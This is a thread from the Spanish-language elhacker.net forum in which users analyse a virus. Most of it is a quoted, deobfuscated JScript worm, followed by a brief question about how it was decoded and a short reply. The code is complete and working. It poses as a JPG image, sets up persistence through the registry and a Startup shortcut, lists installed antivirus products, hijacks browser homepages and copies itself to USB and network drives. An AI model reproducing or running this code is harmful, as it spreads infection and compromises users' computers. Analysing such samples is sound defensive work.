[Ayuda] descifrando un virus

Wolfkey · 8 Octubre 2015, 09:37 AM

Cita de: engel lex en 11 Julio 2015, 17:39 PM
no sabia que el vbs se parecía tanto el js... solo tienes que seguir los pasos sin el eval (para que no se ejecute) y revisar la variable que se evalua

aquí está sin la primera ofuscación

Código (javascript) [Seleccionar] Expandir
try { a = WScript.CreateObject('Scri' + 'pting.Fi' + 'leSys' + 'temObj' + 'ect'); b = WScript.CreateObject('WSc' + 'ript.Sh' + 'ell'); s = WScript.CreateObject('She' + 'll.Appli' + 'cation'); wl = WScript.CreateObject('WbemScr' + 'ipting.SWbemL' + 'ocator'); db = WScript.CreateObject('ADO' + 'DB.Str' + 'eam'); db.CharSet = "US-ASCII"; db.Type = 2; c3 = b.SpecialFolders("Startup"); nt6 = (b.RegRead('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentVersion') >= 6 ? true : false); jico = b.RegRead("HKLM\\SOFTWARE\\Classes\\" + b.RegRead("HKLM\\SOFTWARE\\Classes\\.jpg\\") + "\\DefaultIcon\\"); ico = "explorer.exe"; g = WScript.ScriptFullName; da = new Date(); ano = da.getYear() + ""; mes = da.getMonth(); dia = da.getDate(); hra = 0; antv = new Array(""); rgk = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"; wlg = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell"; gn = new Array("IMG", "IMG_", "PIC", "DSC", "CIMG", "HPIM", "IMAG", "DSCF", "DSCN", "DCIM", "IM", "PICT", "SAM_"); sp = ""; for (r = 0; r < 94; r++) { sp += " "; } ex = gn[Math.round(Math.random() * 12)] + ano.substring(2, 4) + "" + mes + dia + ".JPG" + sp + ".jse"; jex = ""; tas = "explorer"; fsz = a.GetFile(g).Size; wsc = WScript.FullName; stl = "https://www.google.es/#output=search&sclient=psy-ab&q=fiverdolly+"; stp = stl + fsz; if (s.NameSpace(26) == "Roaming") { tot = a.GetFolder(s.NameSpace(26).ParseName("Microsoft").Path).ParentFolder; } else { tot = s.NameSpace(40).ParseName(s.NameSpace(26)).Path; } nt(); } catch (e) {} sf = ""; function nt() { try { c1 = s.NameSpace(28).ParseName("microsoft"); c2 = c1.GetFolder.Items().Count; rf = Math.round(Math.random() * c2 - 1); c4 = c1.GetFolder.Items().item(rf).Path; if (a.FolderExists(c4) == false) { c4 = a.GetFile(c4).ParentFolder; } } catch (e) { c4 = c1.Path; } c5 = Math.random() * 8 + 1 + ""; c5 = c5.replace(".", ""); try { b.RegWrite("HKCU\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\", jico, "REG_SZ"); } catch (e) {} try { jtyp = b.RegRead("HKLM\\SOFTWARE\\Classes\\jpegfile\\FriendlyTypeName"); b.RegWrite("HKCU\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName", jtyp, "REG_EXPAND_SZ"); } catch (e) {} try { b.RegWrite("HKLM\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\", jico, "REG_SZ"); } catch (e) {} try { b.RegWrite("HKLM\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName", jtyp, "REG_EXPAND_SZ"); } catch (e) {} if (g.substring(g.lastIndexOf("\\") + 1, g.length).toLowerCase().search(".jpg" + sp + ".jse") != -1) { try { if (a.FileExists(g.substring(0, g.lastIndexOf(sp + ".jse"))) == true) { b.run('"' + g.substring(0, g.lastIndexOf(sp + ".jse")) + '"'); } else { wp = b.RegRead("HKCU\\Control Panel\\Desktop\\Wallpaper"); if (wp.substring(wp.lastIndexOf("\\") + 1, wp.length) == "TranscodedWallpaper") { jpgc = b.RegRead("HKLM\\SOFTWARE\\Classes\\jpegfile\\shell\\open\\command\\").replace("%1", wp); b.run(jpgc); } else { b.run('"' + wp + '"'); } } } catch (e) {} try { sc = wl.ConnectServer(null, "root\\default"); rg = sc.Get("StdRegProv"); m = rg.Methods_.Item("EnumValues"); pin = m.InParameters.SpawnInstance_(); rk = new Object(); rk["HKCU"] = rk["HKEY_CURRENT_USER"] = 0x80000001; rv = rk[rgk.substr(0, rgk.indexOf("\\"))]; pin.hDefKey = rv; pin.sSubKeyName = rgk.substr(rgk.indexOf("\\") + 1); pot = rg.ExecMethod_(m.Name, pin); ak = pot.sNames.toArray(); for (key in ak) { tts = b.RegRead(rgk + "\\" + ak[key]) + ""; if (tts.search(".exe") != -1) { tts2 = tts.substring(0, tts.search(".exe")); tts3 = tts2.substring(tts2.lastIndexOf(":") - 1, tts2.length) + ".exe"; if (a.FileExists(tts3) == true) { ico = tts3; } if (tts2.indexOf("\\") != -1) { tts2 = tts2.substring(tts2.lastIndexOf("\\") + 1, tts2.length); } tas = tts2; } } } catch (e) {} if (tas.indexOf(" ") != -1) { tas = tas.substring(0, tas.indexOf(" ")); } if (tas.indexOf(".") != -1) { tas = tas.substring(0, tas.indexOf(".")); } try { newd = fsz; olddf = b.RegRead(wlg); olddf = olddf.substring(olddf.lastIndexOf('" "') + 3, olddf.lastIndexOf('"')); } catch (e) { olddf = shcu(); } if (a.FileExists(olddf) == true) { c4 = a.GetFile(olddf).ParentFolder; oldd = a.GetFile(olddf).size; } else { oldd = 0; olddf = c4 + "\\" + c5; } if (newd >= oldd) { if (a.FileExists(olddf) == true) { a.GetFile(olddf).Attributes = 0; } db.Open(); try { av = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter" + (nt6 ? '2' : '')); avi = av.ExecQuery("SELECT * FROM AntiVirusProduct", "WQL"); navi = new Enumerator(avi); antv = new Array(); for (; !navi.atEnd(); navi.moveNext()) { oav = navi.item(); antv.push(oav.displayName); } } catch (e) { antv = new Array("NAC"); } try { vic = "<" + b.RegRead("HKCU\\Volatile Environment\\LOGONSERVER").replace("\\\\", "") + ":" + b.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName") + "=" + s.NameSpace(40) + ":" + antv + ">"; } catch (e) { vic = ""; } cod = ci(); if (cod.search(vic) == -1 && rad != 0) { nda = vic + "**/"; his = cod.replace("**/", nda); db.WriteText(his); } else { db.WriteText(cod); } db.SaveToFile(olddf, 2); db.Close(); try { if (a.GetFile(olddf).OpenAsTextStream(1, -2).ReadAll().charCodeAt(0) != 122) { a.CopyFile(g, olddf, true); } a.GetFile(olddf).Attributes = 2; } catch (e) {} wsh = c4 + "\\" + tas + ".exe"; try { a.CopyFile(wsc, wsh); } catch (e) {} a.GetFile(wsh).Attributes = 2; try { drg = '"' + wsh + '" "' + olddf + '" //E:JScript //B'; shcu(); ec = b.CreateShortcut(c3 + "\\" + tas + ".lnk"); ec.TargetPath = c4 + "\\" + tas + ".exe"; ec.Arguments = '"' + olddf + '" //E:JScript //B -ns'; ec.IconLocation = ico; ec.Save(); b.RegWrite(wlg, drg, 'REG_SZ'); WScript.Sleep(9999); if (b.RegRead(wlg) == drg) { a.DeleteFile(c3 + "\\" + tas + ".lnk"); } } catch (e) {} } } else { try { if (WScript.Arguments.length == 0) { b.run("explorer.exe"); } } catch (e) {} try { fcfp = new Array(); tcmd = new Array(); for (t = 0; t < 9; t++) { tcmd.push(tot + "\\TC201" + t + "\\tcignore.txt"); try { fcfp.push(s.NameSpace(38).ParseName("TotalCommander201" + t).Path + "\\Tools\\Mozilla Firefox\\defaults\\profile"); } catch (e) {} try { fcfp.push(s.NameSpace(48).ParseName("TotalCommander201" + t).Path + "\\Tools\\Mozilla Firefox\\defaults\\profile"); } catch (e) {} } try { tcmd.push(s.NameSpace(38).ParseName("TC UP").Path + "\\tcignore.txt"); } catch (e) {} try { tcmd.push(s.NameSpace(48).ParseName("TC UP").Path + "\\tcignore.txt"); } catch (e) {} try { tcmd.push(s.NameSpace(28).ParseName("ghisler").Path + "\\tcignore.txt"); } catch (e) {} try { tcmd.push(s.NameSpace(26).ParseName("ghisler").Path + "\\tcignore.txt"); } catch (e) {} tcmd.push("c:\\totalcmd\\tcignore.txt"); for (t = 0; t < tcmd.length; t++) { if (a.FileExists(tcmd[t].replace("tcignore.txt", "wincmd.ini")) == true) { try { db.Open(); if (a.FileExists(tcmd[t]) == false) { ttn = a.CreateTextFile(tcmd[t], true); ttn.Write("**.**.jse"); ttn.close(); } igl = ""; try { db.LoadFromFile(tcmd[t]); igl = db.ReadText; } catch (e) {} db.Close(); if (igl.indexOf("**.**.jse") == -1) { db.Open(); db.WriteText(igl, 1); db.WriteText("**.**.jse", 1); a.DeleteFile(tcmd[t]); db.SaveToFile(tcmd[t]); db.Close(); } } catch (e) {} try { tor = a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder + "\\Wincmd.ini", 1, true, 0); toa = tor.ReadAll(); if (toa.search("IgnoreListFileEnabled=0") != -1) { toa = toa.replace("IgnoreListFileEnabled=0", "IgnoreListFileEnabled=1"); } if (toa.search("IgnoreListFile=") == -1) { toa = toa.replace("[Configuration]", "[Configuration]" + "\nIgnoreListFile=" + tcmd[t]); } if (tcmd[t].search("TC201") != -1) { if (toa.search("=*.jse") == -1) { filt = toa.substring(toa.lastIndexOf("Filter") + 6, toa.lastIndexOf(".icon=")); enf = toa.substring(toa.lastIndexOf("Filter"), toa.length); enl = enf.substring(0, enf.indexOf("\n") + 1); fln = new Number(filt) + 1; ficon = toa.substring(toa.search("Filter11.icon=") + 14, toa.length); dicon = ficon.substring(0, ficon.search("\n")); toa = toa.replace(enl, enl + "\nFilter" + fln + "=*.jse\nFilter" + fln + ".icon=" + dicon + "\n"); toa = toa.replace("FileTipWindows=1", "FileTipWindows=0"); } } tor.close(); tow = a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder + "\\Wincmd.ini", 2, true, 0); tow.Write(toa); tow.close(); } catch (e) {} } } } catch (e) {} try { b.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", stp, "REG_SZ") } catch (e) {} try { if (a.FolderExists(tot + "\\Mozilla\\Firefox\\Profiles") == true) { fpf = a.GetFolder(tot + "\\Mozilla\\Firefox\\Profiles"); pff = new Enumerator(fpf.SubFolders); for (; !pff.atEnd(); pff.moveNext()) { pfs = pff.item() + ""; if (pfs.search(".default") != -1) { fcfp.push(pfs); } } } for (q = 0; q < fcfp.length; q++) { try { if (a.FileExists(fcfp[q] + "\\prefs.js") == true); { fjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 1); fjs = fjf.ReadAll(); fjf.close(); usp = 'user_pref("browser.startup.homepage",'; if (fjs.indexOf(usp) != -1) { fjs1 = fjs.substring(fjs.indexOf(usp) + 37, fjs.length); fjs2 = fjs1.substring(0, fjs1.indexOf(');') + 2); fjs3 = fjs.replace(usp + fjs2, usp + ' "' + stp + '");'); wjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 2); wjf.Write(fjs3); } else { wjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 8); wjf.WriteLine('\n' + usp + ' "' + stp + '");'); } wjf.close(); } } catch (e) {} } } catch (e) {} try { gfs = s.NameSpace(28).ParseName("Google").Path + "\\Chrome\\User Data\\Default\\Preferences"; if (a.FileExists(gfs) == true) { gjf = a.OpenTextFile(gfs, 1); gjs = gjf.ReadAll(); gjf.close(); gjsn = gjs.length; urs = '"urls_to_restore_on_startup": ['; ros = '"restore_on_startup":'; rosm = '"restore_on_startup_migrated":'; if (gjs.indexOf(stl) == -1) { if (gjs.indexOf(urs) != -1) { gjs1 = gjs.substring(gjs.indexOf(urs) + 31, gjsn); gjs2 = gjs1.substring(0, gjs1.indexOf("]") + 1); gjs3 = gjs.replace(urs + gjs2, urs + ' "' + stp + '", ' + gjs2); } else { gjs1 = gjs.substring(gjs.indexOf(rosm), gjsn); gjs2 = gjs1.substring(0, gjs1.indexOf("\n") + 1); gjs3 = gjs.replace(gjs2, rosm + ' true,\n\t' + urs + ' "' + stp + '" ]\n'); } gjs4 = gjs.substring(gjs.indexOf(ros), gjsn); gjs5 = gjs4.substring(0, gjs4.indexOf(',') + 1); gjs3 = gjs3.replace(gjs5, ros + ' 4,'); wjg = a.OpenTextFile(gfs, 2); wjg.Write(gjs3); wjg.close(); } else { fds = gjs.substring(gjs.indexOf(stl), gjs.length); fdc = fds.substring(0, fds.indexOf('"')); gjs4 = gjs.replace(fdc, stp); wjg = a.OpenTextFile(gfs, 2); wjg.Write(gjs4); wjg.close(); } } } catch (e) {} mk(); } } function mk() { WScript.Sleep(120000); try { c = new Enumerator(a.Drives); for (; !c.atEnd(); c.moveNext()) { tipodisco = c.item().DriveType; switch (tipodisco) { case 1: case 3: if (c.item() != "A:" && c.item() != "B:") { try { sf = a.GetFolder(pe(c.item() + "\\")); tgf = new Enumerator(sf.files); for (; !tgf.atEnd(); tgf.moveNext()) { stf = tgf.item() + ""; if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") { jex = tgf.item().Name + sp + ".jse"; } if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) { ex = tgf.item().Name; } } if (a.FileExists(sf + "\\" + ex) == false) { if (jex != "") { ex = jex; } a.CopyFile(g, sf + "\\" + ex); if (a.FileExists(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(sf + "\\" + ex).Attributes = a.GetFile(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes; } else { a.GetFile(sf + "\\" + ex).Attributes = 0 }; if (a.FileExists(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2; } } else { if (a.GetFile(sf + "\\" + ex).Size < fsz) { a.GetFile(sf + "\\" + ex).Attributes = 0; a.DeleteFile(sf + "\\" + ex); a.CopyFile(g, sf + "\\" + ex); a.GetFile(sf + "\\" + ex).Attributes = 0; } } } catch (e) {} sf = ""; } break; default: break; } } } catch (e) {} try { if (hra < 12) { hra += 1; } if (hra == 12) { dns = s.NameSpace(18); ens = dns.Items().Count; hns = new Array(); for (f = 0; f < ens; f++) { gns = dns.Items().item(f); hns.push("dns.Items().Item(" + f + ").GetFolder"); } for (i = 0; i < hns.length; i++) { try { jns = eval(hns[i]).Items().Count; for (l = 0; l < jns; l++) { if (a.FolderExists(eval(hns[i] + ".Items().item(" + l + ").Path")) == false) { hns.push(hns[i] + ".Items().item(" + l + ").GetFolder"); } else { try { dis = pe(eval(hns[i] + ".Items().item(" + l + ").Path") + "\\") + ""; di = a.GetFolder(dis); tgf = new Enumerator(di.files); for (; !tgf.atEnd(); tgf.moveNext()) { stf = tgf.item() + ""; if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") { jex = tgf.item().Name + sp + ".jse"; } if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) { ex = tgf.item().Name; } } if (a.FileExists(di + "\\" + ex) == false && dis.charAt(1) != ":") { if (jex != "") { ex = jex; } a.CopyFile(g, di + "\\" + ex); if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(di + "\\" + ex).Attributes = a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes; } else { a.GetFile(di + "\\" + ex).Attributes = 0; } if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2; } } else { if (a.GetFile(di + "\\" + ex).Size < fsz) { a.GetFile(di + "\\" + ex).Attributes = 0; a.DeleteFile(di + "\\" + ex); a.CopyFile(g, di + "\\" + ex); a.GetFile(di + "\\" + ex).Attributes = 0; } } } catch (e) {} } } } catch (e) {} } hra = 0; } } catch (e) {} mk(); } function ci() { try { db2 = a.OpenTextFile(g, 1); g2 = db2.ReadAll(); db2.Close(); g3 = g2.substring(g2.search('z="') + 3, g2.search('";')); g1 = g2.substring(0, g2.search('z="') + 3); gr = g2.substring(g2.search('";'), g2.length); t = ll; tt = ""; tm = t.length; rac = Math.round(Math.random() * 98) + 1; for (x = 0; x < tm; x++) { num = t.charCodeAt(x) + rac; hx = num.toString(16); if (hx.length < 2) { hx = "0" + hx; } tt += hx; hx = ''; } if (rac < 10) { rac = "0" + rac; } tt += rac; g4 = g1 + tt + gr; return g4; } catch (e) {} } function pe(tar) { onef = false; sfp = a.GetFolder(tar); tgc = new Enumerator(sfp.subFolders); for (; !tgc.atEnd(); tgc.moveNext()) { stc = tgc.item().Name.toLowerCase(); if (stc.search("foto") != -1 || stc.search("photo") != -1 || stc.search("image") != -1 || stc.search("im\u00E1ge") != -1 || stc.search("picture") != -1) { if (onef == false) { sfp = a.GetFolder(tgc.item() + "\\"); } onef = true; } } return sfp; } function shcu() { cshc = ""; lnks = new Enumerator(a.GetFolder(c3).files); for (; !lnks.atEnd(); lnks.moveNext()) { try { lks = lnks.item() + ""; if (lks.substring(lks.length - 4, lks.length).toLowerCase() == ".lnk") { lnka = b.CreateShortcut(lnks.item()).Arguments; if (lnka.search("//E:JScript //B -ns") != -1) { cshc = lnka.substring(lnka.indexOf('"') + 1, lnka.lastIndexOf('"')); a.DeleteFile(lnks.item()); } } } catch (e) {} } return cshc; }

Hola, una pregunta, usaste algun programa para traducir, de ser asi cual seria, sino, como lo hiciste para traducir toda esa cadena y en que lenguaje esta ese codigo(no el traducido el original)

Mad Antrax · 8 Octubre 2015, 10:09 AM

No se utilizó ningún programa. Lo tienes todo explicado entre la pagina 2 y 3

Test Foro de elhacker.net SMF 2.1

[Ayuda] descifrando un virus

Wolfkey

Mad Antrax